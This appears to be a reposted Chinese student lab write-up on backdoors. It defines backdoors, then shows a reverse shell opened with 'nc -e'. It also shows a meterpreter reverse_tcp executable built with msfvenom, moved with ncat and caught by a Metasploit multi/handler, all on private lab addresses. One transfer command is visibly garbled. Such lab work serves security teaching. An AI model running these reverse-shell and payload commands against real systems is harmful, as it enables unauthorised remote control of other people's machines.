后门原理与实践

Posted 2017yaya

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了后门原理与实践相关的知识,希望对你有一定的参考价值。

后门的定义

后门就是不经过正常认证流程而访问系统的通道。

哪里有后门呢?

1编译器留后门

2操作系统留后门

3最常见的当然还是应用程序中留后门
4还有就是潜伏于操作系统中或伪装为特定应用的专用后门程序。

实验准备

1、把虚拟机kali的网络改为桥接
2、修改windows控制台的编码方式
法一:在cmd中输入 CHCP 65001(临时转码,不可永久)
技术分享图片

法二:修改regedit注册表
详细操作见此地址:(百度的力量十分强大)https://blog.csdn.net/chy555chy/article/details/78355985
3、关掉防火墙与杀毒软件

一、实验内容

(一)Windows获得Linux Shell:

  1. 在Windows下,先使用ipconfig指令查看winXP(物理机)
    技术分享图片

  2. 使用ncat.exe程序监听本机的1120端口:
    技术分享图片

3.Kali:使用nc指令的-e选项反向连接Windows主机的1120端口
技术分享图片

4.Windows下成功获得了一个Kali的shell,运行ls指令如下
技术分享图片

发生乱码,应提前修改编码方式UTF-8,此时先不改。

(二)使用MSF meterpreter生成可执行文件,利用ncat传送到主机并运行获取主机Shell输入指令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.110 LPORT=1120 -f exe > 20179225_backdoor.exe生成后门程序,生成一个名称为20179225_backdoor.exe 后门可执行文件
技术分享图片

利用ncat或socat传送到主机
接下来需要将这个后门程序传到我们的靶机上,可以通过ncat来实现
在win的cmd下使用 ncat.exe -lv 1120 > 20179225_backdoor.exe 命令在443号端口进行监听
技术分享图片

然后在Linux下使用 ncat -nv 192.168.1.104 443 < 20145328.encat -nv 192.168.1.109 1120 < 20179225_backdoor.exe命令把文件传送过去
技术分享图片

不知为何,连接失败
现直接把文档拷贝过去
接下来

    首先msf打开监听进程

    msfconsole //进入msf
技术分享图片

    use exploit/multi/handler//进入handler模式

    set payload windows/meterpreter/reverse_tcp//设置payload

    set LHOST 192.168.1.110//将LHOST设置为LinuxIP地址

    set LPORT 1120 //设端口为那个1120

技术分享图片

设置完成后,执行监听指令 exploit 。打开windows上的后门程序20151120_backdoor.exe
技术分享图片



















以上是关于后门原理与实践的主要内容,如果未能解决你的问题,请参考以下文章

20192204 Exp2-后门原理与实践

20154322 杨钦涵 Exp2 后门原理与实践

2019-2020-2 20175303柴轩达 《网络对抗技术》Exp2 后门原理与实践

后门原理与实践

Exp3 免杀原理与实践20154302薛师凡

Exp2 后门原理与实践